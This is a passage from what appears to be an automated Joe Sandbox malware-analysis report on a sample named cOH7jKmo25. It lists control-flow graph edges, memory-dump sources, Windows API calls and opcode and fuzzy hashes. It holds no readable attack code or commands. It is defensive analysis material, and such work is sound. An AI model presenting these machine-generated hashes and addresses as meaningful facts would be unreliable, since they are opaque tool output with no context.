24327->24274 24328->24327 24329->24327 24331 2977e8a 24330->24331 24332 2977f8b 24331->24332 24333 5960a7c KiUserExceptionDispatcher 24331->24333 24334 5960a6a KiUserExceptionDispatcher 24331->24334 24332->24274 24333->24332 24334->24332 24336 2977eeb 24335->24336 24337 2977f8b 24336->24337 24338 5960a7c KiUserExceptionDispatcher 24336->24338 24339 5960a6a KiUserExceptionDispatcher 24336->24339 24337->24274 24338->24337 24339->24337 24341 2977e5e 24340->24341 24342 2977f8b 24341->24342 24343 5960a7c KiUserExceptionDispatcher 24341->24343 24344 5960a6a KiUserExceptionDispatcher 24341->24344 24342->24274 24343->24342 24344->24342 24346 2977ec4 24345->24346 24347 2977f8b 24346->24347 24348 5960a7c KiUserExceptionDispatcher 24346->24348 24349 5960a6a KiUserExceptionDispatcher 24346->24349 24347->24274 24348->24347 24349->24347 24351 2977f75 24350->24351 24352 2977f8b 24351->24352 24353 5960a7c KiUserExceptionDispatcher 24351->24353 24354 5960a6a KiUserExceptionDispatcher 24351->24354 24352->24274 24353->24352 24354->24352 24356 5960a7d 24355->24356 24357 5960a82 KiUserExceptionDispatcher 24356->24357 24358 5960a95 24356->24358 24357->24356 24358->24302 24360 5960a7d 24359->24360 24361 5960a82 KiUserExceptionDispatcher 24360->24361 24362 5960a95 24360->24362 24361->24360 24362->24302

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 685 5960b20-5960b75 LdrInitializeThunk 689 5960b7c-5960b83 685->689 690 5960b85-5960bb9 689->690 691 5960bcb-5960be4 689->691 690->691 700 5960bbb-5960bc5 690->700 693 5960be6 691->693 694 5960bef 691->694 693->694 696 5960bf0 694->696 696->696 700->691
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2570313306.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5960000_cOH7jKmo25.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 5eef3976d5277a3126fb63d5e28584bf6f1e3a1a30f25c79fd0d0c18f41fd802
                                                                                                                                                        • Instruction ID: cd4d5fde261d6be156f99378eb5a332d7245c21da101a0e5925ae656b35b08cb
                                                                                                                                                        • Opcode Fuzzy Hash: 5eef3976d5277a3126fb63d5e28584bf6f1e3a1a30f25c79fd0d0c18f41fd802
                                                                                                                                                        • Instruction Fuzzy Hash: 7C215C317002148FCB58EB38C5987AE37F6ABC8349F244469C406A73A5DF769C46CB91
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2566112723.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_2970000_cOH7jKmo25.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 299789dfa1b4827b493291ceaf41fcc74ea14b0840a764122f370faf07651fa8
                                                                                                                                                        • Instruction ID: bbf774f12c72d3bf50ea9b040385bfa60cde0eef4599ef0331348bf7bd851938
                                                                                                                                                        • Opcode Fuzzy Hash: 299789dfa1b4827b493291ceaf41fcc74ea14b0840a764122f370faf07651fa8
                                                                                                                                                        • Instruction Fuzzy Hash: 41B15EB0E00209CFDB50CFA9C8857AEBBF6BF88704F558529D815E7294EB749845CF81
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2566112723.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_2970000_cOH7jKmo25.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b1ba4dd5f27fffc86720d758efd42bc4154f721cf529f47607973bc0e8997e75
                                                                                                                                                        • Instruction ID: 00108e1342fabedfe131a4df34e927a2414791615b6f1d4aa683252c04e0e33a
                                                                                                                                                        • Opcode Fuzzy Hash: b1ba4dd5f27fffc86720d758efd42bc4154f721cf529f47607973bc0e8997e75
                                                                                                                                                        • Instruction Fuzzy Hash: 2FB14D70E00609CFDF10CFA9D88579EBBFAAF88714F148529D819E7298EB749845CF81

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 0 2971750-297177f 1 2971785-29717f7 call 2970af8 0->1 2 2971a2a-2971a8b 0->2 27 29717fd-2971874 1->27 12 2971ab6-2971abf 2->12 14 2971ac1-2971ac7 12->14 15 2971a8d-2971a96 12->15 16 2971aca-2971baf call 2970b34 call 2971bd0 15->16 17 2971a98-2971aa6 15->17 62 2971bb5-2971bcd 16->62 17->16 18 2971aa8-2971aac 17->18 20 2971ab3 18->20 21 2971aae-2971ab0 18->21 20->12 21->20 46 2971876-2971889 27->46 47 297188b-29718af 27->47 48 29718b6-29718ba 46->48 47->48 51 29718c5 48->51 52 29718bc 48->52 51->2 52->51
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2566112723.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_2970000_cOH7jKmo25.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: D@$D@
                                                                                                                                                        • API String ID: 0-3862852415
                                                                                                                                                        • Opcode ID: b29eae5142a3f44d538c7e0d17cc6fbc4f0e4690e562952a28e79eae3f1cc994
                                                                                                                                                        • Instruction ID: 652385301276d2c359d8e3605af9ffce3edfbfc9e6949818379fd1b085ea911f
                                                                                                                                                        • Opcode Fuzzy Hash: b29eae5142a3f44d538c7e0d17cc6fbc4f0e4690e562952a28e79eae3f1cc994
                                                                                                                                                        • Instruction Fuzzy Hash: 09517C34B101148FDB04DF69C458BAEBBF6EF88700F2581A9E806EB3A5DA75DD01CB91

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 65 2971f3f-2971fa5 69 2971fb0 65->69 70 2971fbc-29728e4 69->70 219 29728ef-29728f5 call 2977020 70->219 220 29728fb-2972d95 219->220 291 2972da0 220->291 292 2972daa-2972dba 291->292
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2566112723.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_2970000_cOH7jKmo25.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ~
                                                                                                                                                        • API String ID: 0-2493274609
                                                                                                                                                        • Opcode ID: b0c10c40b83536642a2bdbe46e62eb2ecb10ebfd19a6c28869ff330a54678a05
                                                                                                                                                        • Instruction ID: fe3f7b34176a0c9d93ecff001b788b2d021486beccbffc07162b0c2d1eb3a945
                                                                                                                                                        • Opcode Fuzzy Hash: b0c10c40b83536642a2bdbe46e62eb2ecb10ebfd19a6c28869ff330a54678a05
                                                                                                                                                        • Instruction Fuzzy Hash: 5C72CA70A0021C8FEB55EBA1CD547EE77B6BF88300F1080E9D24AAB2A4DE355E95DF51

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 295 2971f50-2972da0 call 2977020 522 2972daa-2972dba 295->522
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2566112723.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_2970000_cOH7jKmo25.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ~
                                                                                                                                                        • API String ID: 0-2493274609
                                                                                                                                                        • Opcode ID: 59b154c209288eb219e0ddcde5d31a272a34ea81b756bed8c58dd4455381a55a
                                                                                                                                                        • Instruction ID: 120f00dd2269a171c7669c499e51109dc4050b4a81978e959ce789ef5670cef5
                                                                                                                                                        • Opcode Fuzzy Hash: 59b154c209288eb219e0ddcde5d31a272a34ea81b756bed8c58dd4455381a55a
                                                                                                                                                        • Instruction Fuzzy Hash: E272CA70A0021C8FEB55EBA1C9547EE77B6BF88300F1080E9D24AAB2A4DE355E95DF51

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 525 297cb98-297cbb9 526 297cbc7-297cbcb 525->526 527 297cbbb-297cbbf 525->527 529 297d22a 526->529 530 297cbd1-297cbd4 526->530 528 297cbc5 527->528 527->529 528->530 531 297d22f-297d234 529->531 530->531 532 297cbda-297cbe2 530->532 540 297d239-297d240 531->540 533 297cbe4-297cbe7 532->533 534 297cbf2-297cc0e call 297cab8 532->534 536 297cbed 533->536 537 297ccbc-297cce0 call 297cab8 533->537 542 297cc10-297cc26 call 297cab8 534->542 543 297cc8b-297ccb7 call 297cab8 534->543 536->540 547 297cce2-297ccfb 537->547 548 297ccfd-297cd0b 537->548 553 297cc58-297cc7d call 297cab8 542->553 554 297cc28-297cc2c 542->554 543->540 560 297cd35-297cd47 547->560 548->529 549 297cd11-297cd13 548->549 549->529 552 297cd19-297cd1b 549->552 552->529 556 297cd21-297cd2d 552->556 575 297cc85-297cc89 553->575 554->553 557 297cc2e-297cc4e call 297cab8 554->557 556->560 577 297cc56 557->577 562 297cd59-297cd76 call 297cab8 560->562 563 297cd49 560->563 573 297cd7e-297cd8d 562->573 574 297cd78-297cd7c 562->574 563->540 568 297cd4f-297cd53 563->568 568->540 568->562 576 297cd90-297ce22 573->576 574->573 574->576 575->542 575->543 585 297ce25-297ce4d 576->585 577->575 585->531 588 297ce53-297ce71 585->588 589 297ce73 588->589 590 297ce7a-297ce83 588->590 591 297ced5-297cee6 589->591 592 297ce75-297ce78 589->592 593 297ce85-297ceab 590->593 594 297cead-297ced3 590->594 595 297cef4-297cef8 591->595 596 297cee8-297ceec 591->596 592->590 592->591 602 297cf16-297cf1f 593->602 594->602 595->529 597 297cefe-297cf01 595->597 596->529 600 297cef2 596->600 597->531 601 297cf07-297cf0f 597->601 600->597 601->602 602->531 603 297cf25-297cf3a 602->603 603->585 604 297cf40-297cf44 603->604 605 297cf46-297cf4a 604->605 606 297cf4c-297cf50 604->606 605->606 607 297cf60-297cf64 605->607 608 297d087-297d093 606->608 609 297cf56-297cf5a 606->609 610 297cf66-297cf6a 607->610 611 297cfc5-297cfc9 607->611 608->531 612 297d099-297d0aa 608->612 609->607 609->608 610->611 615 297cf6c-297cf78 610->615 613 297d027-297d02b 611->613 614 297cfcb-297cfcf 611->614 612->531 616 297d0b0-297d0b7 612->616 613->608 617 297d02d-297d031 613->617 614->613 618 297cfd1-297cfdd 614->618 615->531 619 297cf7e-297cf99 615->619 616->531 620 297d0bd-297d0c4 616->620 617->608 621 297d033-297d03f 617->621 618->531 622 297cfe3-297cffe 618->622 619->531 629 297cf9f-297cfa7 619->629 620->531 623 297d0ca-297d0d1 620->623 621->531 625 297d045-297d060 621->625 622->531 632 297d004-297d00c 622->632 623->531 624 297d0d7-297d0ea call 297cab8 623->624 634 297d0ec-297d0f0 624->634 635 297d14a-297d14e 624->635 625->531 636 297d066-297d06e 625->636 629->531 633 297cfad-297cfc0 629->633 632->531 637 297d012-297d025 632->637 633->608 634->635 639 297d0f2-297d0fe 634->639 641 297d150-297d154 635->641 642 297d1ab-297d1af 635->642 636->531 640 297d074-297d07f 636->640 637->608 639->531 643 297d104-297d12c 639->643 640->608 641->642 647 297d156-297d162 641->647 644 297d202-297d217 642->644 645 297d1b1-297d1b5 642->645 643->531 659 297d132-297d145 643->659 650 297d219 644->650 651 297d228 644->651 645->644 653 297d1b7-297d1c3 645->653 647->531 648 297d168-297d190 647->648 648->531 660 297d196-297d1a9 648->660 650->562 654 297d21f-297d222 650->654 651->540 653->531 656 297d1c5-297d1ed 653->656 654->562 654->651 656->531 663 297d1ef-297d1fa 656->663 659->644 660->644 663->644
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2566112723.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_2970000_cOH7jKmo25.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: d
                                                                                                                                                        • API String ID: 0-2564639436
                                                                                                                                                        • Opcode ID: 319b175320fe43ca021f9ac806aa5628e29d9495f7601ef6ab21fe7848b25626
                                                                                                                                                        • Instruction ID: 4f3a44c19456b7daf0659b254828f4356e97ee664b2d64c1782e80f8a62d9e41
                                                                                                                                                        • Opcode Fuzzy Hash: 319b175320fe43ca021f9ac806aa5628e29d9495f7601ef6ab21fe7848b25626
                                                                                                                                                        • Instruction Fuzzy Hash: 1E322670A00609DFDB24CF69C884BADFBF6FF88318F148629E4159B655D730E896CB94

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 668 5960b1e-5960b5b 671 5960b62-5960b75 LdrInitializeThunk 668->671 672 5960b7c-5960b83 671->672 673 5960b85-5960bb9 672->673 674 5960bcb-5960be4 672->674 673->674 683 5960bbb-5960bc5 673->683 676 5960be6 674->676 677 5960bef 674->677 676->677 679 5960bf0 677->679 679->679 683->674
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2570313306.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5960000_cOH7jKmo25.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 0cd0e4ce3996b544eb5345c401c3f9831b875687e6cd57f0839d89b10e5c36ba
                                                                                                                                                        • Instruction ID: e837ae830be678540748cb3bb69a99b8bd4be478759c5406fe2b6597c57dd0dd
                                                                                                                                                        • Opcode Fuzzy Hash: 0cd0e4ce3996b544eb5345c401c3f9831b875687e6cd57f0839d89b10e5c36ba
                                                                                                                                                        • Instruction Fuzzy Hash: DD215C317001158FCB59EB38C5A8BAE37F6ABC9349F244469C406A73A9DF768C46CB91

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 702 5965311-5965318 703 596531a-596537f 702->703 704 5965388 702->704 703->704 706 5965389-59653b7 KiUserCallbackDispatcher 704->706 707 59653c0-59653e6 706->707 708 59653b9-59653bf 706->708 708->707
                                                                                                                                                        APIs
                                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(00000050), ref: 059653A3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2570313306.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5960000_cOH7jKmo25.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                                        • Opcode ID: f74f8293d1eef860692e0a2d774f9c1c8c0430431a9d6508d9991176afff8cdd
                                                                                                                                                        • Instruction ID: 63b8d6a13a8df777aa75077cfa00e3b10bc6825f4fea825c61818a6ad56222c6
                                                                                                                                                        • Opcode Fuzzy Hash: f74f8293d1eef860692e0a2d774f9c1c8c0430431a9d6508d9991176afff8cdd
                                                                                                                                                        • Instruction Fuzzy Hash: D82136B1804259CFDB04DFA9E445BAEBBF4FB08310F54856AD415B3280D778A948CFA5

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 714 5965320-59653b7 KiUserCallbackDispatcher 720 59653c0-59653e6 714->720 721 59653b9-59653bf 714->721 721->720
                                                                                                                                                        APIs
                                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(00000050), ref: 059653A3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2570313306.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5960000_cOH7jKmo25.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                                        • Opcode ID: 6bccc26102974dbc5b1be460baaa74fe8fe16aaccf161a9a78613bcbd3ab19c9
                                                                                                                                                        • Instruction ID: 4fbc391b15e02135e3360334177d1b6b1807ff90f5b1016b4f983030a5b83352
                                                                                                                                                        • Opcode Fuzzy Hash: 6bccc26102974dbc5b1be460baaa74fe8fe16aaccf161a9a78613bcbd3ab19c9
                                                                                                                                                        • Instruction Fuzzy Hash: 0B2104B590425ACFDB00DFAAE445AEEBBF4FB08320F14855AE419B7280C7796944CFA5

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 724 5960a6a-5960a72 725 5960a90-5960a93 724->725 726 5960a7d-5960a80 724->726 725->726 729 5960a95-5960a9c 725->729 727 5960a82-5960a8f KiUserExceptionDispatcher 726->727 728 5960aa9-5960aae 726->728 727->725 730 5960ab3-5960ab9 728->730 729->730 731 5960a9e 729->731 733 5960aa7 731->733 733->730
                                                                                                                                                        APIs
                                                                                                                                                        • KiUserExceptionDispatcher.NTDLL ref: 05960A89
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2570313306.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5960000_cOH7jKmo25.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatcherExceptionUser
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 6842923-0
                                                                                                                                                        • Opcode ID: 37b22f17104b3bc1d270fea6872bfc931f46fc3ab4714e3ac6a01bb6d676953d
                                                                                                                                                        • Instruction ID: cfa25790d593c2c4610a765ee4d1964ec6b4e4689905ee4521d5dcca947a29e8
                                                                                                                                                        • Opcode Fuzzy Hash: 37b22f17104b3bc1d270fea6872bfc931f46fc3ab4714e3ac6a01bb6d676953d
                                                                                                                                                        • Instruction Fuzzy Hash: 4CE06D3A901525DFDB15DB95EA9C6BCF331FBC4351F018121C04623550C730689ACBC1

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 734 5960a7c 735 5960a7d-5960a80 734->735 736 5960a82-5960a93 KiUserExceptionDispatcher 735->736 737 5960aa9-5960aae 735->737 736->735 739 5960a95-5960a9c 736->739 741 5960ab3-5960ab9 737->741 739->741 742 5960a9e 739->742 743 5960aa7 742->743 743->741
                                                                                                                                                        APIs
                                                                                                                                                        • KiUserExceptionDispatcher.NTDLL ref: 05960A89
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2570313306.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5960000_cOH7jKmo25.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatcherExceptionUser
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 6842923-0
                                                                                                                                                        • Opcode ID: 6d45a1c45832eb2da301648701a96ea9a3a5b103b4dd6dac829164a2375c6e64
                                                                                                                                                        • Instruction ID: c070a14a7b3820cfc48261c9859fe88db93db1efdd2e177ddc181e9739f3e1b8
                                                                                                                                                        • Opcode Fuzzy Hash: 6d45a1c45832eb2da301648701a96ea9a3a5b103b4dd6dac829164a2375c6e64
                                                                                                                                                        • Instruction Fuzzy Hash: E8E0463AA02924EFCB05CB85EA9C6BCB375FBC0352F008122C48663550C731689ACB80

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 886 2978651-2978692 891 2978704-2978716 886->891 892 2978694 886->892 896 2978723-297877a 891->896 897 2978718 891->897 893 2978697-29786a3 call 2970dac 892->893 898 29786a8-29786ab 893->898 907 297877c-29787e6 896->907 908 29787e8-29787fd 896->908 897->896 899 29786ad-29786c5 898->899 900 29786fb-2978702 898->900 899->900 903 29786c7-29786f4 call 2978250 899->903 900->891 900->893 903->900 907->908 914 29787fe 908->914 914->914
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2566112723.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_2970000_cOH7jKmo25.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: K
                                                                                                                                                        • API String ID: 0-2299363055
                                                                                                                                                        • Opcode ID: 96b3c770a39d3958e6d6dc89c11e02ad2d898ba5c9668f58e74ce45341e8eaaf
                                                                                                                                                        • Instruction ID: 96f94dbc9b83fa695bb9d75c86f1730f363d0298a68e2ace43315b4cc763d296
                                                                                                                                                        • Opcode Fuzzy Hash: 96b3c770a39d3958e6d6dc89c11e02ad2d898ba5c9668f58e74ce45341e8eaaf
                                                                                                                                                        • Instruction Fuzzy Hash: EF419070A00649CBDB24DFA9D5506AEBBF6BFC8304F208529D416AB391DB70AD45DB40

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 744 2970ef7-2970f58 879 2970f5a call 29712e0 744->879 880 2970f5a call 297133c 744->880 881 2970f5a call 29713ea 744->881 882 2970f5a call 29715b8 744->882 883 2970f5a call 29715a8 744->883 750 2970f60-2970f77 785 2970f79 call 29716d7 750->785 786 2970f79 call 29712e0 750->786 787 2970f79 call 297133c 750->787 788 2970f79 call 29713ea 750->788 789 2970f79 call 2971718 750->789 790 2970f79 call 29715b8 750->790 791 2970f79 call 29715a8 750->791 752 2970f7f-2970f96 792 2970f98 call 29716d7 752->792 793 2970f98 call 29712e0 752->793 794 2970f98 call 297133c 752->794 795 2970f98 call 29713ea 752->795 796 2970f98 call 2971718 752->796 797 2970f98 call 29715b8 752->797 798 2970f98 call 29715a8 752->798 754 2970f9e-2970fb5 799 2970fb7 call 29716d7 754->799 800 2970fb7 call 29712e0 754->800 801 2970fb7 call 297133c 754->801 802 2970fb7 call 29713ea 754->802 803 2970fb7 call 2971718 754->803 804 2970fb7 call 29715b8 754->804 805 2970fb7 call 29715a8 754->805 756 2970fbd-2970fd4 806 2970fd6 call 29716d7 756->806 807 2970fd6 call 29712e0 756->807 808 2970fd6 call 297133c 756->808 809 2970fd6 call 29713ea 756->809 810 2970fd6 call 2971718 756->810 811 2970fd6 call 29715b8 756->811 812 2970fd6 call 29715a8 756->812 758 2970fdc-2970ff3 813 2970ff5 call 29716d7 758->813 814 2970ff5 call 29712e0 758->814 815 2970ff5 call 297133c 758->815 816 2970ff5 call 29713ea 758->816 817 2970ff5 call 2971718 758->817 818 2970ff5 call 29715b8 758->818 819 2970ff5 call 29715a8 758->819 760 2970ffb-2971012 820 2971014 call 29716d7 760->820 821 2971014 call 29712e0 760->821 822 2971014 call 297133c 760->822 823 2971014 call 29713ea 760->823 824 2971014 call 2971718 760->824 825 2971014 call 29715b8 760->825 826 2971014 call 29715a8 760->826 762 297101a-2971031 827 2971033 call 29716d7 762->827 828 2971033 call 29712e0 762->828 829 2971033 call 297133c 762->829 830 2971033 call 29713ea 762->830 831 2971033 call 2971718 762->831 832 2971033 call 29715b8 762->832 833 2971033 call 29715a8 762->833 764 2971039-2971050 834 2971052 call 29716d7 764->834 835 2971052 call 29712e0 764->835 836 2971052 call 297133c 764->836 837 2971052 call 29713ea 764->837 838 2971052 call 2971718 764->838 839 2971052 call 29715b8 764->839 840 2971052 call 29715a8 764->840 766 2971058-297106f 841 2971071 call 29716d7 766->841 842 2971071 call 29712e0 766->842 843 2971071 call 297133c 766->843 844 2971071 call 29713ea 766->844 845 2971071 call 2971718 766->845 846 2971071 call 29715b8 766->846 847 2971071 call 29715a8 766->847 768 2971077-297108e 848 2971090 call 29716d7 768->848 849 2971090 call 29712e0 768->849 850 2971090 call 297133c 768->850 851 2971090 call 29713ea 768->851 852 2971090 call 2971718 768->852 853 2971090 call 29715b8 768->853 854 2971090 call 29715a8 768->854 770 2971096-29710ad 855 29710af call 29716d7 770->855 856 29710af call 29712e0 770->856 857 29710af call 297133c 770->857 858 29710af call 29713ea 770->858 859 29710af call 2971718 770->859 860 29710af call 29715b8 770->860 861 29710af call 29715a8 770->861 772 29710b5-29710c0 862 29710c0 call 2971750 772->862 863 29710c0 call 2971a29 772->863 864 29710c0 call 2971a68 772->864 774 29710c6-29710dd 865 29710df call 29716d7 774->865 866 29710df call 29712e0 774->866 867 29710df call 297133c 774->867 868 29710df call 29713ea 774->868 869 29710df call 2971718 774->869 870 29710df call 29715b8 774->870 871 29710df call 29715a8 774->871 776 29710e5-2971108 872 297110a call 29716d7 776->872 873 297110a call 29712e0 776->873 874 297110a call 297133c 776->874 875 297110a call 29713ea 776->875 876 297110a call 2971718 776->876 877 297110a call 29715b8 776->877 878 297110a call 29715a8 776->878 779 2971110-297112b 884 297112b call 2971cd8 779->884 885 297112b call 2971cc8 779->885 783 2971131-2971143 785->752 786->752 787->752 788->752 789->752 790->752 791->752 792->754 793->754 794->754 795->754 796->754 797->754 798->754 799->756 800->756 801->756 802->756 803->756 804->756 805->756 806->758 807->758 808->758 809->758 810->758 811->758 812->758 813->760 814->760 815->760 816->760 817->760 818->760 819->760 820->762 821->762 822->762 823->762 824->762 825->762 826->762 827->764 828->764 829->764 830->764 831->764 832->764 833->764 834->766 835->766 836->766 837->766 838->766 839->766 840->766 841->768 842->768 843->768 844->768 845->768 846->768 847->768 848->770 849->770 850->770 851->770 852->770 853->770 854->770 855->772 856->772 857->772 858->772 859->772 860->772 861->772 862->774 863->774 864->774 865->776 866->776 867->776 868->776 869->776 870->776 871->776 872->779 873->779 874->779 875->779 876->779 877->779 878->779 879->750 880->750 881->750 882->750 883->750 884->783 885->783
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2566112723.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_2970000_cOH7jKmo25.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: (~
                                                                                                                                                        • API String ID: 0-3359682220
                                                                                                                                                        • Opcode ID: edf9b31c32e79d564dad4232cebb10c55b7f78bdccfa113b5c5a7796b5c581ba
                                                                                                                                                        • Instruction ID: ef7c518bee1097454fee3ee5097fba3ea3307774622954bc3656620fae014dc8
                                                                                                                                                        • Opcode Fuzzy Hash: edf9b31c32e79d564dad4232cebb10c55b7f78bdccfa113b5c5a7796b5c581ba
                                                                                                                                                        • Instruction Fuzzy Hash: DE51FC78500202CFC706FF30EA7486977A2FF8530D350856DD40A9BABADB79995ACF81

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 923 29715b8-29715d8 924 29715e6 923->924 925 29715da-29715e4 923->925 926 29715eb-29715ed 924->926 925->926 927 29715f3-297163c 926->927 928 29716d8-2971734 call 2971750 926->928 937 297163e-2971642 927->937 938 2971648-297168f 927->938 943 297173a-297174a 928->943 937->938 947 2971695-29716b9 938->947 950 29716c4-29716c5 947->950 951 29716bb 947->951 950->928 951->950
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2566112723.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_2970000_cOH7jKmo25.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
